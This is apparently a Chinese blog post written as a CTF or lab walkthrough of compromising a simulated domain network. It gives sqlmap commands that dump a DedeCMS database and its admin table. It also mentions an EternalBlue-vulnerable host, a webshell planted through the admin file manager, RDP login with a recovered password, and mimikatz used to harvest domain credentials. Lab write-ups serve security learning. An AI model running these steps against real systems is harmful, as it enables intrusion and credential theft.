铁三域控

image-20240122100842191

fscan先粗略扫一遍

有一个141的永恒之蓝可以利用

image-20240122101234048

123的是一个织梦的cms 拿新学的yakit扫一遍目录

image-20240122101844114

sql目录能进行sqlmap梭

爆库 sqlmap -u http://172.25.0.123/sql/?id=2 –dbs

image-20240122102118718

爆表 sqlmap -u http://172.25.0.123/sql/?id=2 -D dedecmsv57utf8sp1 –tables

image-20240122102143865

爆字段 sqlmap -u http://172.25.0.123/sql/?id=2 -D dedecmsv57utf8sp1 -T flag –dump

image-20240122102404025

image-20240122102935171

一个后台管理平台 想着能爆数据库那么也能拿管理员密码

image-20240122102836711

这边查一下存放密码字段的表

sqlmap -u http://172.25.0.123/sql/?id=2 -D dedecmsv57utf8sp1 -T topsec_admin –dump

image-20240122112327296

image-20240122112312381

登录在文件管理处上马 其实没必要 上一次就有flag

image-20240122113012933

redesktop 连接那台141永恒之蓝 密码就是在密码库里爆出来的没加md5的

image-20240122142611590

自带的mimikatza抓一波域密码

image-20240122145542263

直接远程连接拿flag

image-20240122152802811


铁三域控
http://example.com/2024/01/22/penetration/铁三域控/
作者
Re1ca1g
发布于
2024年1月22日
许可协议